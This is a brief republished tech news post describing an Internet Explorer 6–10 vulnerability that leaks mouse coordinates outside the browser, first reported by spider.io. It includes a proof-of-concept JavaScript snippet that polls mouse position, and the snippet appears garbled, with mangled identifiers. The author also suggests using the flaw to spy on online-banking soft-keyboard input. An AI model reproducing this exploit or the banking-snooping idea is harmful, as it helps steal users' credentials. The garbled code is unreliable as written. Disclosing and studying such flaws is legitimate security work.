Shulou(Shulou.com)06/01 Report--

I just saw another IE vulnerability on Seclist. The main impact of this vulnerability is the ability to track mouse coordinates, even if the current mouse position is in a non-browser window. The vulnerability was first discovered by the spider.io team.

Affected version: IE6-10

Test:

Create a new html file under the system directory as follows:

Exploit Demo window.attachEvent ("onload", function () {var detector = document.getElementById ("detector"); detector.attachEvent ("onmousemove", function (e) {contributor [XSS _ clean] = e.screenX + "," + e.screeny;}); setInterval (function () {detector.fireEvent ("onmousemove");}, 100); Open the new html file with IE

Imagine uploading the loophole to someone else's computer and using online silver, thinking that the soft keyboard is safe, but I don't think so after the test.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.